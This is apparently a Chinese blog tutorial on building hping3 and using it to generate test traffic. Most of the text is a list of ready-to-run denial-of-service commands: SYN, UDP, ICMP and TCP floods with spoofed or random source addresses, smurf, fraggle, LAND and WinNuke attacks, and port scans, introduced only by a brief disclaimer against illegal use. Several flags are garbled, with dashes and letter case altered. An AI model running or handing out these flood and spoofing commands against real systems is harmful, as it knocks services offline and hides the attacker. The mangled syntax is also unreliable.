寫在之前
本篇只是在工作中,需要模擬一些網路包的狀態時,使用hping3命令可以很好的模擬,注意請不要用於非法用途,現在是法治社會哦。
安裝
1. 安裝依賴包
yum -y install libpcap-devel tcl-devel
檢查:libpcap及libpcap-devel是否存在,不存在就安裝,安裝後就做個連線:ln -sf /usr/include/pcap-bpf.h /usr/include/net/bpf.h 否則在編譯階段會報錯如下:
libpcap_stuff.c:19:21: fatal error: net/bpf.h: no such file or directory
2. 從github上clone源**
git clone
3. 編譯安裝
cd hping
./configure
make
make install
常用方式1. 向目標傳送資料報,比如傳送兩個資料報
hping3 -c 2 192.168.0.2hping3 -c 2 192.168.0.2
2. tcp 洪水攻擊
hping3 -sarupf -p 80 –flood –rand-source 192.168.100.1
hping3 --flood 192.168.0.2
3. icmp 洪水攻擊
hping3 --flood 192.168.0.2 -1
hping3 -q -n -d 200 –icmp –flood -a 11.11.11.11 192.168.100.1
-q安靜模式 -n不解析網域名稱 -a指定偽造ip
4. udp 洪水攻擊
hping3 --flood 192.168.0.2 -2
hping3 –udp -s 6666 -p 53 -a 8.8.8.8 –flood 192.168.100.1
5. syn 洪水攻擊
hping3 --flood 192.168.0.2 -s
hping3 -c 1000 -d 120 -s -p 80 –flood –rand-source 192.168.100.1
-c 指定連線數 -p 目標埠
-d 指定資料部分的大小 -s 攻擊型別是syn flood
–flood 以泛洪的方式攻擊 –rand-source 隨機產生偽造源位址
hping3 -s -p -u -p 80 –flood –rand-source 192.168.100.1
-p flag置為push -u flag置為urge緊急
加這兩引數可以提高效率
6. winnuke攻擊
hping3 -u 192.168.0.2 -p 139
winnuke 攻擊的埠不僅是139 埠,還有「138、137、113、53」等埠
7. 埠掃瞄
hping3 -8 all -s 192.168.0.2
hping3 -8 1-1024 -s 192.168.0.2
注意:-s是利用syn包進行掃瞄,也可以使用-2 udp形式進行掃瞄,-8是埠掃瞄模式,all是掃瞄所有的埠,如果掃瞄指定的埠的話,可以使用-來連線;
8. ip 位址欺騙攻擊
hping3 -a 111.111.111.111 192.168.0.2
-a 引數後接著的位址為需要隱藏的源位址,
9. ip分片
hping3 192.168.0.2 -s -p 80 -f
10. smurf 或者 fraggle攻擊
hping3 -1 192.168.0.255
hping3 -1 -a 192.168.0.1 192.168.0.255
fraggle攻擊即由smurf的icmp協議的攻擊改為由udp協議的攻擊,因此只需要修改乙個引數即可,
將「-1」 改為「-2」 (我們utm實現的是典型埠7模式即hping3 -2 192.168.0.255 -p 7)
11. land 攻擊
hping3 -s -a 192.168.0.2 -p 21 192.168.0.2
hping3 -n -s -p 80 -a 192.168.100.1 –flood 192.168.100.1
land攻擊即是偽裝成被攻擊位址傳送請求資訊給被攻擊位址本身
12. tcp選項異常
(1) syn 包被分片# hping3 -s 192.168.0.2 -f
(2) tcp 包僅設定了fin flag# hping3 -f 192.168.0.2
(3) tcp包沒有設定任何flag# hping3 192.168.0.2
(4) tcp包的fin和rst flag同時被設定# hping3 -f -r 192.168.0.2
(5) tcp包的syn和urg flag同時被設定# hping3 -s -u 192.168.0.2
(6)tcp包的syn和rst flag同時被設定# hping3 -s -r 192.168.0.2
(7)tcp包的syn和fin flag同時被設定# hping3 -s -f 192.168.0.2
13. 資料報跟蹤
hping3 –traceroute -v -1 www.baidu.com
類似於traceroute www.baidu.com;
14. 檔案互傳
傳送端:
hping3 -2 -p 1373 192.168.100.102 -d 100 -e test.txt
-2 udp模式 -p埠
-d 資料大小 -e 檔名
接收端:
nc -lp 1373 -u -w 5 > recv.txt && cat recv.txt
-l 監聽模式 -p 埠
-w 超時時間 -u udp模式
您的關注是我寫作的動力
安裝使用類
tcpdump 使用小結
centos7.6核心公升級
centos 7 公升級 python 與 yum 修改
centos 7 安裝 redis 5.0.8 單例項
centos 7 下 yum 安裝 mysql 5.7 最簡教程
kubernetes中部署 nacos,使用外部mysql儲存
你真的了解客戶端請求如何到達伺服器端的嗎
**分享
kubeadm使用外部etcd部署kubernetes v1.17.3 高可用集群
第一篇 使用 prometheus 監控 kubernetes 集群理論篇
hping2 使用引數說明
hping引數,可以用hping h來看 h help 顯示幫助 v version 版本資訊 c count count 傳送資料報的次數 關於countreached timeout 可以在hping2.h裡編輯 i interval 包傳送間隔時間 單位是毫秒 預設時間是1秒,此功能在增加傳輸...
使用hping3 nping施行DoS攻擊
ddos攻擊是常見的攻擊方式,每小時大約發生28次。提供在世界範圍內的ddos實時攻擊分布圖 從ddos攻擊的地圖上就可以看出國際形勢 例如,到9月18號可以看到日本 中國的攻擊 川普宣布建牆之後,可以看到墨西哥 美國的攻擊。使用hping3進行dos攻擊 hping3 c 10000 d 120 ...
使用hping3 nping施行DoS攻擊
ddos攻擊是常見的攻擊方式,每小時大約發生28次。提供在世界範圍內的ddos實時攻擊分布圖 從ddos攻擊的地圖上就可以看出國際形勢 例如,到9月18號可以看到日本 中國的攻擊 川普宣布建牆之後,可以看到墨西哥 美國的攻擊。使用hping3進行dos攻擊 hping3 c 10000 d 120 ...